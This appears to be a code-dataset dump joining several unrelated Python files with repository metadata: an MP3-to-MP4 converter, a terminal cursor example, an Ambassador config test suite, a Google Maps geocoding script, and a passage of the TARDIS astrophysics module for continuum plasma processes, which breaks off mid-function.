780d4741b79a45c1e5541527a58313a36d665e47
|
[
"MIT"
] | 1
|
2020-03-28T02:57:32.000Z
|
2020-03-28T02:57:32.000Z
|
import subprocess
from mimetypes import MimeTypes
from os import devnull, getcwd, listdir, makedirs, walk
from os.path import basename, dirname, exists, isfile, join, splitext
from pprint import pprint
from urllib.request import pathname2url
ALLOWED_AUDIO_MIMETYPES = ['audio/mpeg']
ALLOWED_IMAGE_MIMETYPES = ['image/jpeg', 'image/png']
CWD = getcwd()
MP3_DIR = join(CWD, 'mp3')
# Setup necessary variables
mime = MimeTypes()
def get_mp3_dirs():
dirs = next(walk(MP3_DIR))[1]
return map(lambda d: join(MP3_DIR, d), dirs)
def get_mp3_files(dir_path):
files = [f for f in listdir(dir_path) if isfile(join(dir_path, f))]
full_paths = map(lambda f: join(dir_path, f), files)
mp3_files = filter(lambda f: (get_mime_type(f) in ALLOWED_AUDIO_MIMETYPES), full_paths)
return mp3_files
def get_image_file(dir_path):
files = [f for f in listdir(dir_path) if isfile(join(dir_path, f))]
full_paths = map(lambda f: join(dir_path, f), files)
for file_path in full_paths:
if get_mime_type(file_path) in ALLOWED_IMAGE_MIMETYPES:
return file_path
return False
def get_mime_type(file_path):
url = pathname2url(file_path)
mime_type = mime.guess_type(url)
return mime_type[0]
def convert_to_mp4(file_path, image_path):
dir_name = basename(dirname(file_path))
file_name = splitext(basename(file_path))[0]
target_dir = join(CWD, 'mp4', dir_name)
target_path = join(target_dir, file_name) + '.mp4'
if not exists(target_dir):
print(f'Directory doesn\'t exist. Creating "{target_dir}"')
makedirs(target_dir)
print(f'Converting "{file_name}"')
args = ['ffmpeg', '-loglevel', 'panic', '-y',
'-loop', '1', '-r', '1',
'-i', image_path,
'-i', file_path,
'-c:a', 'copy', '-vf', 'scale=720:-2',
'-shortest', target_path]
subprocess.call(args)
def main():
dirs = get_mp3_dirs()
for d in dirs:
image_file = get_image_file(d)
if not image_file:
print(f'Could not find image file for "{d}". Continuing...')
continue
mp3_files = get_mp3_files(d)
for mp3_file in mp3_files:
convert_to_mp4(mp3_file, image_file)
print('Absolutely DONE.')
if __name__ == '__main__':
main()
| 26.95122
| 89
| 0.687783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 335
| 0.151584
|
b7247af0becba5f41e0c2a4a41f7a5b86547cdbf
| 24
|
py
|
Python
|
lang/Python/terminal-control-cursor-positioning-1.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | 1
|
2018-11-09T22:08:38.000Z
|
2018-11-09T22:08:38.000Z
|
lang/Python/terminal-control-cursor-positioning-1.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | null | null | null |
lang/Python/terminal-control-cursor-positioning-1.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | 1
|
2018-11-09T22:08:40.000Z
|
2018-11-09T22:08:40.000Z
|
print("\033[6;3HHello")
| 12
| 23
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.666667
|
b724c571207a17423525239296130cc889afe81a
| 6,169
|
py
|
Python
|
ambassador/tests/ambassador_test.py
|
tesserai/ambassador
|
70fadc62872be9b041b90cba54d3920a21777548
|
[
"Apache-2.0"
] | 1
|
2019-01-22T05:36:23.000Z
|
2019-01-22T05:36:23.000Z
|
ambassador/tests/ambassador_test.py
|
tesserai/ambassador
|
70fadc62872be9b041b90cba54d3920a21777548
|
[
"Apache-2.0"
] | null | null | null |
ambassador/tests/ambassador_test.py
|
tesserai/ambassador
|
70fadc62872be9b041b90cba54d3920a21777548
|
[
"Apache-2.0"
] | null | null | null |
import sys
import difflib
import errno
import json
import logging
import functools
import os
import pytest
from shell import shell
from diag_paranoia import diag_paranoia, filtered_overview, sanitize_errors
VALIDATOR_IMAGE = "datawire/ambassador-envoy-alpine:v1.5.0-116-g7ccb25882"
DIR = os.path.dirname(__file__)
EXCLUDES = [ "__pycache__" ]
# TESTDIR = os.path.join(DIR, "tests")
TESTDIR = DIR
DEFAULT_CONFIG = os.path.join(DIR, "..", "default-config")
MATCHES = [ n for n in os.listdir(TESTDIR)
if (n.startswith('0') and os.path.isdir(os.path.join(TESTDIR, n)) and (n not in EXCLUDES)) ]
os.environ['SCOUT_DISABLE'] = "1"
#### decorators
def standard_setup(f):
func_name = getattr(f, '__name__', '<anonymous>')
# @functools.wraps(f)
def wrapper(directory, *args, **kwargs):
print("%s: directory %s" % (func_name, directory))
dirpath = os.path.join(TESTDIR, directory)
testname = os.path.basename(dirpath)
configdir = os.path.join(dirpath, 'config')
if os.path.exists(os.path.join(dirpath, 'TEST_DEFAULT_CONFIG')):
configdir = DEFAULT_CONFIG
print("%s: using config %s" % (testname, configdir))
return f(testname, dirpath, configdir, *args, **kwargs)
return wrapper
#### Utilities
def unified_diff(gold_path, current_path):
gold = json.dumps(json.load(open(gold_path, "r")), indent=4, sort_keys=True)
current = json.dumps(json.load(open(current_path, "r")), indent=4, sort_keys=True)
udiff = list(difflib.unified_diff(gold.split("\n"), current.split("\n"),
fromfile=os.path.basename(gold_path),
tofile=os.path.basename(current_path),
lineterm=""))
return udiff
#### Test functions
@pytest.mark.parametrize("directory", MATCHES)
@standard_setup
def test_config(testname, dirpath, configdir):
errors = []
if not os.path.isdir(configdir):
errors.append("configdir %s is not a directory" % configdir)
print("==== checking intermediate output")
ambassador = shell([ 'ambassador', 'dump', configdir ])
if ambassador.code != 0:
errors.append('ambassador dump failed! %s' % ambassador.code)
else:
current_raw = ambassador.output(raw=True)
current = None
gold = None
try:
current = sanitize_errors(json.loads(current_raw))
except json.decoder.JSONDecodeError as e:
errors.append("current intermediate was unparseable?")
if current:
current['envoy_config'] = filtered_overview(current['envoy_config'])
current_path = os.path.join(dirpath, "intermediate.json")
json.dump(current, open(current_path, "w"), sort_keys=True, indent=4)
gold_path = os.path.join(dirpath, "gold.intermediate.json")
if os.path.exists(gold_path):
udiff = unified_diff(gold_path, current_path)
if udiff:
errors.append("gold.intermediate.json and intermediate.json do not match!\n\n%s" % "\n".join(udiff))
print("==== checking config generation")
envoy_json_out = os.path.join(dirpath, "envoy.json")
try:
os.unlink(envoy_json_out)
except OSError as e:
if e.errno != errno.ENOENT:
raise
ambassador = shell([ 'ambassador', 'config', '--check', configdir, envoy_json_out ])
print(ambassador.errors(raw=True))
if ambassador.code != 0:
errors.append('ambassador failed! %s' % ambassador.code)
else:
envoy = shell([ 'docker', 'run',
'--rm',
'-v', '%s:/etc/ambassador-config' % dirpath,
VALIDATOR_IMAGE,
'/usr/local/bin/envoy',
'--base-id', '1',
'--mode', 'validate',
'-c', '/etc/ambassador-config/envoy.json' ],
verbose=True)
envoy_succeeded = (envoy.code == 0)
if not envoy_succeeded:
errors.append('envoy failed! %s' % envoy.code)
envoy_output = list(envoy.output())
if envoy_succeeded:
if not envoy_output[-1].strip().endswith(' OK'):
errors.append('envoy validation failed!')
gold_path = os.path.join(dirpath, "gold.json")
if os.path.exists(gold_path):
udiff = unified_diff(gold_path, envoy_json_out)
if udiff:
errors.append("gold.json and envoy.json do not match!\n\n%s" % "\n".join(udiff))
print("==== checking short-circuit with existing config")
ambassador = shell([ 'ambassador', 'config', '--check', configdir, envoy_json_out ])
print(ambassador.errors(raw=True))
if ambassador.code != 0:
errors.append('ambassador repeat check failed! %s' % ambassador.code)
if 'Output file exists' not in ambassador.errors(raw=True):
errors.append('ambassador repeat check did not short circuit??')
if errors:
print("---- ERRORS")
print("%s" % "\n".join(errors))
assert not errors, ("failing, errors: %d" % len(errors))
@pytest.mark.parametrize("directory", MATCHES)
@standard_setup
def test_diag(testname, dirpath, configdir):
errors = []
errorcount = 0
if not os.path.isdir(configdir):
errors.append("configdir %s is not a directory" % configdir)
errorcount += 1
results = diag_paranoia(configdir, dirpath)
if results['warnings']:
errors.append("[DIAG WARNINGS]\n%s" % "\n".join(results['warnings']))
if results['errors']:
errors.append("[DIAG ERRORS]\n%s" % "\n".join(results['errors']))
errorcount += len(results['errors'])
if errors:
print("---- ERRORS")
print("%s" % "\n".join(errors))
print("---- OVERVIEW ----")
print("%s" % results['overview'])
print("---- RECONSTITUTED ----")
print("%s" % results['reconstituted'])
assert errorcount == 0, ("failing, errors: %d" % errorcount)
| 31.635897
| 120
| 0.595396
| 0
| 0
| 0
| 0
| 4,334
| 0.702545
| 0
| 0
| 1,464
| 0.237316
|
b7253bf44267f3981869514c6f90cf8cf83b6b75
| 538
|
py
|
Python
|
geocode_missing.py
|
UoA-eResearch/billboards
|
196a4931dc7ed21a5ff001e539254b0a93ddad2c
|
[
"MIT"
] | null | null | null |
geocode_missing.py
|
UoA-eResearch/billboards
|
196a4931dc7ed21a5ff001e539254b0a93ddad2c
|
[
"MIT"
] | null | null | null |
geocode_missing.py
|
UoA-eResearch/billboards
|
196a4931dc7ed21a5ff001e539254b0a93ddad2c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import json
import googlemaps
import sys
import os
gmaps = googlemaps.Client(key=os.environ["GOOGLE_API_KEY"])
print(gmaps)
filename = sys.argv[1]
with open(filename) as f:
data = json.load(f)
for d in data:
if d.get("address") and not d.get("latitude"):
result = gmaps.geocode(d["address"])
print(result)
result = result[0]["geometry"]["location"]
d["latitude"] = result["lat"]
d["longitude"] = result["lng"]
with open(filename, "w") as f:
json.dump(data, f)
| 23.391304
| 59
| 0.633829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 120
| 0.223048
|
b7262426be3d901c9e4c8163e1aff5cbb71a7660
| 48,109
|
py
|
Python
|
tardis/plasma/properties/continuum_processes.py
|
AlexHls/tardis
|
5d6e2299f35953a65e2c974994c55fe4aa3caae9
|
[
"BSD-3-Clause"
] | null | null | null |
tardis/plasma/properties/continuum_processes.py
|
AlexHls/tardis
|
5d6e2299f35953a65e2c974994c55fe4aa3caae9
|
[
"BSD-3-Clause"
] | 1
|
2020-07-20T16:45:52.000Z
|
2020-07-20T16:45:52.000Z
|
tardis/plasma/properties/continuum_processes.py
|
jordi5/tardis
|
2e1cb75c91ea842526b0c7c80a13cc8646178813
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
import numpy as np
import pandas as pd
from numba import prange, njit
from tardis import constants as const
from tardis.plasma.exceptions import PlasmaException
from tardis.plasma.properties.base import (
ProcessingPlasmaProperty,
Input,
TransitionProbabilitiesProperty,
)
from tardis.plasma.properties.j_blues import JBluesDiluteBlackBody
__all__ = [
"SpontRecombRateCoeff",
"StimRecombRateCoeff",
"PhotoIonRateCoeff",
"PhotoIonEstimatorsNormFactor",
"PhotoIonRateCoeffEstimator",
"StimRecombRateCoeffEstimator",
"CorrPhotoIonRateCoeff",
"BfHeatingRateCoeffEstimator",
"StimRecombCoolingRateCoeffEstimator",
"SpontRecombCoolingRateCoeff",
"RawRecombTransProbs",
"RawPhotoIonTransProbs",
"CollDeexcRateCoeff",
"CollExcRateCoeff",
"RawCollisionTransProbs",
"AdiabaticCoolingRate",
"FreeFreeCoolingRate",
"FreeBoundCoolingRate",
"BoundFreeOpacity",
"LevelNumberDensityLTE",
"PhotoIonBoltzmannFactor",
"FreeBoundEmissionCDF",
"RawTwoPhotonTransProbs",
"TwoPhotonEmissionCDF",
"TwoPhotonFrequencySampler",
"CollIonRateCoeffSeaton",
"CollRecombRateCoeff",
"RawCollIonTransProbs",
"BoundFreeOpacityInterpolator",
"FreeFreeOpacity",
"ContinuumOpacityCalculator",
"FreeFreeFrequencySampler",
"FreeBoundFrequencySampler",
]
N_A = const.N_A.cgs.value
K_B = const.k_B.cgs.value
C = const.c.cgs.value
H = const.h.cgs.value
A0 = const.a0.cgs.value
M_E = const.m_e.cgs.value
E = const.e.esu.value
BETA_COLL = (H ** 4 / (8 * K_B * M_E ** 3 * np.pi ** 3)) ** 0.5
F_K = (
16
/ (3.0 * np.sqrt(3))
* np.sqrt((2 * np.pi) ** 3 * K_B / (H ** 2 * M_E ** 3))
* (E ** 2 / C) ** 3
) # See Eq. 19 in Sutherland, R. S. 1998, MNRAS, 300, 321
FF_OPAC_CONST = (
(2 * np.pi / (3 * M_E * K_B)) ** 0.5 * 4 * E ** 6 / (3 * M_E * H * C)
) # See Eq. 6.1.8 in http://personal.psu.edu/rbc3/A534/lec6.pdf
logger = logging.getLogger(__name__)
njit_dict = {"fastmath": False, "parallel": False}
@njit(**njit_dict)
def integrate_array_by_blocks(f, x, block_references):
"""
Integrate a function over blocks.
This function integrates a function `f` defined at locations `x`
over blocks given in `block_references`.
Parameters
----------
f : numpy.ndarray, dtype float
2D input array to integrate.
x : numpy.ndarray, dtype float
1D array with the sample points corresponding to the `f` values.
block_references : numpy.ndarray, dtype int
1D array with the start indices of the blocks to be integrated.
Returns
-------
numpy.ndarray, dtype float
2D array with integrated values.
"""
integrated = np.zeros((len(block_references) - 1, f.shape[1]))
for i in prange(f.shape[1]): # columns
for j in prange(len(integrated)): # rows
start = block_references[j]
stop = block_references[j + 1]
integrated[j, i] = np.trapz(f[start:stop, i], x[start:stop])
return integrated
# It is currently not possible to use scipy.integrate.cumulative_trapezoid in
# numba. So here is my own implementation.
@njit(**njit_dict)
def numba_cumulative_trapezoid(f, x):
"""
Cumulatively integrate f(x) using the composite trapezoidal rule.
Parameters
----------
f : numpy.ndarray, dtype float
Input array to integrate.
x : numpy.ndarray, dtype float
The coordinate to integrate along.
Returns
-------
numpy.ndarray, dtype float
The result of cumulative integration of f along x
"""
integ = (np.diff(x) * (f[1:] + f[:-1]) / 2.0).cumsum()
return integ / integ[-1]
@njit(**njit_dict)
def cumulative_integrate_array_by_blocks(f, x, block_references):
"""
Cumulatively integrate a function over blocks.
This function cumulatively integrates a function `f` defined at
locations `x` over blocks given in `block_references`.
Parameters
----------
f : numpy.ndarray, dtype float
Input array to integrate. Shape is (N_freq, N_shells), where
N_freq is the number of frequency values and N_shells is the number
of computational shells.
x : numpy.ndarray, dtype float
The sample points corresponding to the `f` values. Shape is (N_freq,).
block_references : numpy.ndarray, dtype int
The start indices of the blocks to be integrated. Shape is (N_blocks,).
Returns
-------
numpy.ndarray, dtype float
Array with cumulatively integrated values. Shape is (N_freq, N_shells)
same as f.
"""
n_rows = len(block_references) - 1
integrated = np.zeros_like(f)
for i in prange(f.shape[1]): # columns
# TODO: Avoid this loop through vectorization of cumulative_trapezoid
for j in prange(n_rows): # rows
start = block_references[j]
stop = block_references[j + 1]
integrated[start + 1 : stop, i] = numba_cumulative_trapezoid(
f[start:stop, i], x[start:stop]
)
return integrated
def get_ion_multi_index(multi_index_full, next_higher=True):
"""
Calculate the corresponding ion MultiIndex for a level MultiIndex.
Parameters
----------
multi_index_full : pandas.MultiIndex (atomic_number, ion_number,
level_number)
next_higher : bool, default True
If True use ion number of next higher ion, else use ion_number from
multi_index_full.
Returns
-------
pandas.MultiIndex (atomic_number, ion_number)
Ion MultiIndex for the given level MultiIndex.
"""
atomic_number = multi_index_full.get_level_values(0)
ion_number = multi_index_full.get_level_values(1)
if next_higher is True:
ion_number += 1
return pd.MultiIndex.from_arrays([atomic_number, ion_number])
def get_ground_state_multi_index(multi_index_full):
"""
Calculate the ground-state MultiIndex for the next higher ion.
Parameters
----------
multi_index_full : pandas.MultiIndex (atomic_number, ion_number,
level_number)
Returns
-------
pandas.MultiIndex (atomic_number, ion_number)
Ground-state MultiIndex for the next higher ion.
"""
atomic_number = multi_index_full.get_level_values(0)
ion_number = multi_index_full.get_level_values(1) + 1
level_number = np.zeros_like(ion_number)
return pd.MultiIndex.from_arrays([atomic_number, ion_number, level_number])
def cooling_rate_series2dataframe(cooling_rate_series, destination_level_idx):
"""
Transform cooling-rate Series to DataFrame.
This function transforms a Series with cooling rates into
an indexed DataFrame that can be used in MarkovChainTransProbs.
Parameters
----------
cooling_rate_series : pandas.Series, dtype float
Cooling rates for a process with a single destination idx.
Examples are adiabatic cooling or free-free cooling.
destination_level_idx : str
Destination idx of the cooling process; for example
'adiabatic' for adiabatic cooling.
Returns
-------
cooling_rate_frame : pandas.DataFrame, dtype float
Indexed by source_level_idx, destination_level_idx, transition_type
for the use in MarkovChainTransProbs.
"""
index_names = [
"source_level_idx",
"destination_level_idx",
"transition_type",
]
index = pd.MultiIndex.from_tuples(
[("k", destination_level_idx, -1)], names=index_names
)
cooling_rate_frame = pd.DataFrame(
cooling_rate_series.values[np.newaxis], index=index
)
return cooling_rate_frame
def bf_estimator_array2frame(bf_estimator_array, level2continuum_idx):
"""
Transform a bound-free estimator array to a DataFrame.
This function transforms a bound-free estimator array with entries
sorted by frequency to a multi-indexed DataFrame sorted by level.
Parameters
----------
bf_estimator_array : numpy.ndarray, dtype float
Array of bound-free estimators (e.g., for the stimulated recombination rate)
with entries sorted by the threshold frequency of the bound-free continuum.
level2continuum_idx : pandas.Series, dtype int
Maps a level MultiIndex (atomic_number, ion_number, level_number) to
the continuum_idx of the corresponding bound-free continuum (which are
sorted by decreasing frequency).
Returns
-------
pandas.DataFrame, dtype float
Bound-free estimators indexed by (atomic_number, ion_number, level_number).
"""
bf_estimator_frame = pd.DataFrame(
bf_estimator_array, index=level2continuum_idx.index
).sort_index()
bf_estimator_frame.columns.name = "Shell No."
return bf_estimator_frame
class IndexSetterMixin(object):
@staticmethod
def set_index(p, photo_ion_idx, transition_type=0, reverse=True):
idx = photo_ion_idx.loc[p.index]
transition_type = transition_type * np.ones_like(
idx.destination_level_idx
)
transition_type = pd.Series(transition_type, name="transition_type")
idx_arrays = [idx.source_level_idx, idx.destination_level_idx]
if reverse:
idx_arrays = idx_arrays[::-1]
idx_arrays.append(transition_type)
index = pd.MultiIndex.from_arrays(idx_arrays)
if reverse:
index.names = index.names[:-1][::-1] + [index.names[-1]]
p = p.set_index(index, drop=True)
return p
class SpontRecombRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
alpha_sp : pandas.DataFrame, dtype float
The rate coefficient for spontaneous recombination.
"""
outputs = ("alpha_sp",)
latex_name = (r"\alpha^{\textrm{sp}}",)
def calculate(
self,
photo_ion_cross_sections,
t_electrons,
photo_ion_block_references,
photo_ion_index,
phi_ik,
boltzmann_factor_photo_ion,
):
x_sect = photo_ion_cross_sections["x_sect"].values
nu = photo_ion_cross_sections["nu"].values
alpha_sp = 8 * np.pi * x_sect * nu ** 2 / C ** 2
alpha_sp = alpha_sp[:, np.newaxis]
alpha_sp = alpha_sp * boltzmann_factor_photo_ion
alpha_sp = integrate_array_by_blocks(
alpha_sp, nu, photo_ion_block_references
)
alpha_sp = pd.DataFrame(alpha_sp, index=photo_ion_index)
return alpha_sp * phi_ik.loc[alpha_sp.index]
class SpontRecombCoolingRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
c_fb_sp : pandas.DataFrame, dtype float
The rate coefficient for cooling by
spontaneous recombination.
"""
outputs = ("c_fb_sp",)
latex_name = (r"c^{\textrm{sp}}_{\textrm{fb}}",)
def calculate(
self,
photo_ion_cross_sections,
t_electrons,
photo_ion_block_references,
photo_ion_index,
phi_ik,
nu_i,
boltzmann_factor_photo_ion,
):
x_sect = photo_ion_cross_sections["x_sect"].values
nu = photo_ion_cross_sections["nu"].values
factor = (1 - nu_i / photo_ion_cross_sections["nu"]).values
alpha_sp = (8 * np.pi * x_sect * factor * nu ** 3 / C ** 2) * H
alpha_sp = alpha_sp[:, np.newaxis]
alpha_sp = alpha_sp * boltzmann_factor_photo_ion
alpha_sp = integrate_array_by_blocks(
alpha_sp, nu, photo_ion_block_references
)
alpha_sp = pd.DataFrame(alpha_sp, index=photo_ion_index)
return alpha_sp * phi_ik.loc[alpha_sp.index]
class FreeBoundEmissionCDF(ProcessingPlasmaProperty):
"""
Attributes
----------
fb_emission_cdf : pandas.DataFrame, dtype float
The cumulative distribution function (CDF) for the frequencies of
energy packets emitted in free-bound transitions. The tabulated CDF
is used to sample packet frequencies in the Monte Carlo simulation.
We use the same CDF for free-bound emission from k- and i-packets
(in contrast to ARTIS).
"""
outputs = ("fb_emission_cdf",)
latex_name = (r"P(\nu_{bf, emission}) \leq \nu)",)
def calculate(
self,
photo_ion_cross_sections,
t_electrons,
photo_ion_block_references,
photo_ion_index,
nu_i,
boltzmann_factor_photo_ion,
):
x_sect = photo_ion_cross_sections["x_sect"].values
nu = photo_ion_cross_sections["nu"].values
# alpha_sp_E will be missing a lot of prefactors since we are only
# interested in relative values here
alpha_sp_E = nu ** 3 * x_sect
alpha_sp_E = alpha_sp_E[:, np.newaxis]
alpha_sp_E = alpha_sp_E * boltzmann_factor_photo_ion
alpha_sp_E = cumulative_integrate_array_by_blocks(
alpha_sp_E, nu, photo_ion_block_references
)
fb_emission_cdf = pd.DataFrame(
alpha_sp_E, index=photo_ion_cross_sections.index
)
return fb_emission_cdf
class PhotoIonRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
gamma : pandas.DataFrame, dtype float
The rate coefficient for radiative ionization.
"""
outputs = ("gamma",)
latex_name = (r"\gamma",)
def calculate(
self,
photo_ion_cross_sections,
gamma_estimator,
photo_ion_norm_factor,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
level2continuum_idx,
):
# Used for initialization
if gamma_estimator is None:
gamma = self.calculate_from_dilute_bb(
photo_ion_cross_sections,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
)
else:
gamma_estimator = bf_estimator_array2frame(
gamma_estimator, level2continuum_idx
)
gamma = gamma_estimator * photo_ion_norm_factor.value
return gamma
@staticmethod
def calculate_from_dilute_bb(
photo_ion_cross_sections,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
):
nu = photo_ion_cross_sections["nu"]
x_sect = photo_ion_cross_sections["x_sect"]
j_nus = JBluesDiluteBlackBody.calculate(
photo_ion_cross_sections, nu, t_rad, w
)
gamma = j_nus.multiply(4.0 * np.pi * x_sect / nu / H, axis=0)
gamma = integrate_array_by_blocks(
gamma.values, nu.values, photo_ion_block_references
)
gamma = pd.DataFrame(gamma, index=photo_ion_index)
return gamma
class StimRecombRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
alpha_stim : pandas.DataFrame, dtype float
The rate coefficient for stimulated recombination.
"""
outputs = ("alpha_stim",)
latex_name = (r"\alpha^{\textrm{stim}}",)
def calculate(
self,
photo_ion_cross_sections,
alpha_stim_estimator,
photo_ion_norm_factor,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
phi_ik,
t_electrons,
boltzmann_factor_photo_ion,
level2continuum_idx,
):
# Used for initialization
if alpha_stim_estimator is None:
alpha_stim = self.calculate_from_dilute_bb(
photo_ion_cross_sections,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
t_electrons,
boltzmann_factor_photo_ion,
)
else:
alpha_stim_estimator = bf_estimator_array2frame(
alpha_stim_estimator, level2continuum_idx
)
alpha_stim = alpha_stim_estimator * photo_ion_norm_factor
alpha_stim *= phi_ik.loc[alpha_stim.index]
return alpha_stim
@staticmethod
def calculate_from_dilute_bb(
photo_ion_cross_sections,
photo_ion_block_references,
photo_ion_index,
t_rad,
w,
t_electrons,
boltzmann_factor_photo_ion,
):
nu = photo_ion_cross_sections["nu"]
x_sect = photo_ion_cross_sections["x_sect"]
j_nus = JBluesDiluteBlackBody.calculate(
photo_ion_cross_sections, nu, t_rad, w
)
j_nus *= boltzmann_factor_photo_ion
alpha_stim = j_nus.multiply(4.0 * np.pi * x_sect / nu / H, axis=0)
alpha_stim = integrate_array_by_blocks(
alpha_stim.values, nu.values, photo_ion_block_references
)
alpha_stim = pd.DataFrame(alpha_stim, index=photo_ion_index)
return alpha_stim
class RawRecombTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_recomb : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
spontaneous recombination.
"""
outputs = ("p_recomb",)
transition_probabilities_outputs = ("p_recomb",)
latex_name = (r"p^{\textrm{recomb}}",)
def calculate(self, alpha_sp, nu_i, energy_i, photo_ion_idx):
p_recomb_deactivation = alpha_sp.multiply(nu_i, axis=0) * H
p_recomb_deactivation = self.set_index(
p_recomb_deactivation, photo_ion_idx, transition_type=-1
)
p_recomb_internal = alpha_sp.multiply(energy_i, axis=0)
p_recomb_internal = self.set_index(
p_recomb_internal, photo_ion_idx, transition_type=0
)
p_recomb = pd.concat([p_recomb_deactivation, p_recomb_internal])
return p_recomb
class RawPhotoIonTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_photo_ion : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
radiative ionization.
"""
outputs = ("p_photo_ion",)
transition_probabilities_outputs = ("p_photo_ion",)
latex_name = (r"p^{\textrm{photo_ion}}",)
def calculate(self, gamma_corr, energy_i, photo_ion_idx):
p_photo_ion = gamma_corr.multiply(energy_i, axis=0)
p_photo_ion = self.set_index(p_photo_ion, photo_ion_idx, reverse=False)
return p_photo_ion
class CorrPhotoIonRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
gamma_corr : pandas.DataFrame, dtype float
The rate coefficient for radiative ionization corrected for
stimulated recombination.
"""
outputs = ("gamma_corr",)
latex_name = (r"\gamma_\mathrm{corr}",)
def calculate(
self,
gamma,
alpha_stim,
electron_densities,
ion_number_density,
level_number_density,
):
n_k_index = get_ion_multi_index(alpha_stim.index)
n_k = ion_number_density.loc[n_k_index].values
n_i = level_number_density.loc[alpha_stim.index].values
gamma_corr = gamma - (alpha_stim * n_k / n_i).multiply(
electron_densities
)
num_neg_elements = (gamma_corr < 0).sum().sum()
if num_neg_elements:
raise PlasmaException("Negative values in CorrPhotoIonRateCoeff.")
return gamma_corr
class PhotoIonEstimatorsNormFactor(ProcessingPlasmaProperty):
outputs = ("photo_ion_norm_factor",)
latex_name = (r"\frac{1}{t_\textrm{simulation volume h}}",)
@staticmethod
def calculate(time_simulation, volume):
return (time_simulation * volume * H) ** -1
class PhotoIonRateCoeffEstimator(Input):
"""
Attributes
----------
gamma_estimator : pandas.DataFrame, dtype float
Unnormalized MC estimator for the rate coefficient for radiative
ionization.
"""
outputs = ("gamma_estimator",)
latex_name = (r"\gamma_\textrm{estim}",)
class StimRecombRateCoeffEstimator(Input):
"""
Attributes
----------
alpha_stim_estimator : pandas.DataFrame, dtype float
Unnormalized MC estimator for the rate coefficient for stimulated
recombination.
"""
outputs = ("alpha_stim_estimator",)
latex_name = (r"\alpha^{\textrm{stim}}_\textrm{estim}",)
class StimRecombCoolingRateCoeffEstimator(Input):
"""
Attributes
----------
stim_recomb_cooling_coeff_estimator : pandas.DataFrame, dtype float
Unnormalized MC estimator for the stimulated recombination cooling rate
coefficient.
"""
outputs = ("stim_recomb_cooling_coeff_estimator",)
class BfHeatingRateCoeffEstimator(Input):
"""
Attributes
----------
bf_heating_coeff_estimator : pandas.DataFrame, dtype float
Unnormalized MC estimator for the rate
coefficient for bound-free heating.
"""
outputs = ("bf_heating_coeff_estimator",)
latex_name = (r"h_\textrm{bf}_\textrm{estim}",)
class CollExcRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
coll_exc_coeff : pandas.DataFrame, dtype float
Rate coefficient for collisional excitation.
"""
outputs = ("coll_exc_coeff",)
latex_name = ("c_{lu}",)
def calculate(self, yg_interp, yg_index, t_electrons, delta_E_yg):
yg = yg_interp(t_electrons)
boltzmann_factor = np.exp(
-delta_E_yg.values[np.newaxis].T / (t_electrons * K_B)
)
q_ij = (
BETA_COLL / np.sqrt(t_electrons) * yg * boltzmann_factor
) # see formula A2 in Przybilla, Butler 2004 - Apj 609, 1181
return pd.DataFrame(q_ij, index=yg_index)
class CollDeexcRateCoeff(ProcessingPlasmaProperty):
"""
Attributes
----------
coll_deexc_coeff : pandas.DataFrame, dtype float
Rate coefficient for collisional deexcitation.
"""
outputs = ("coll_deexc_coeff",)
latex_name = ("c_{ul}",)
def calculate(self, thermal_lte_level_boltzmann_factor, coll_exc_coeff):
level_lower_index = coll_exc_coeff.index.droplevel("level_number_upper")
level_upper_index = coll_exc_coeff.index.droplevel("level_number_lower")
n_lower_prop = thermal_lte_level_boltzmann_factor.loc[
level_lower_index
].values
n_upper_prop = thermal_lte_level_boltzmann_factor.loc[
level_upper_index
].values
coll_deexc_coeff = coll_exc_coeff * n_lower_prop / n_upper_prop
return coll_deexc_coeff
class RawCollisionTransProbs(TransitionProbabilitiesProperty, IndexSetterMixin):
"""
Attributes
----------
p_coll : pandas.DataFrame, dtype float
The unnormalized transition probabilities for
collisional excitation.
"""
outputs = ("p_coll",)
transition_probabilities_outputs = ("p_coll",)
latex_name = (r"p^{\textrm{coll}}",)
def calculate(
self,
coll_exc_coeff,
coll_deexc_coeff,
yg_idx,
electron_densities,
delta_E_yg,
atomic_data,
level_number_density,
):
p_deexc_deactivation = (coll_deexc_coeff * electron_densities).multiply(
delta_E_yg.values, axis=0
)
p_deexc_deactivation = self.set_index(
p_deexc_deactivation, yg_idx, reverse=True
)
p_deexc_deactivation = p_deexc_deactivation.groupby(level=[0]).sum()
index_dd = pd.MultiIndex.from_product(
[p_deexc_deactivation.index.values, ["k"], [0]],
names=list(yg_idx.columns) + ["transition_type"],
)
p_deexc_deactivation = p_deexc_deactivation.set_index(index_dd)
level_lower_index = coll_deexc_coeff.index.droplevel(
"level_number_upper"
)
energy_lower = atomic_data.levels.energy.loc[level_lower_index]
p_deexc_internal = (coll_deexc_coeff * electron_densities).multiply(
energy_lower.values, axis=0
)
p_deexc_internal = self.set_index(
p_deexc_internal, yg_idx, transition_type=0, reverse=True
)
p_exc_internal = (coll_exc_coeff * electron_densities).multiply(
energy_lower.values, axis=0
)
p_exc_internal = self.set_index(
p_exc_internal, yg_idx, transition_type=0, reverse=False
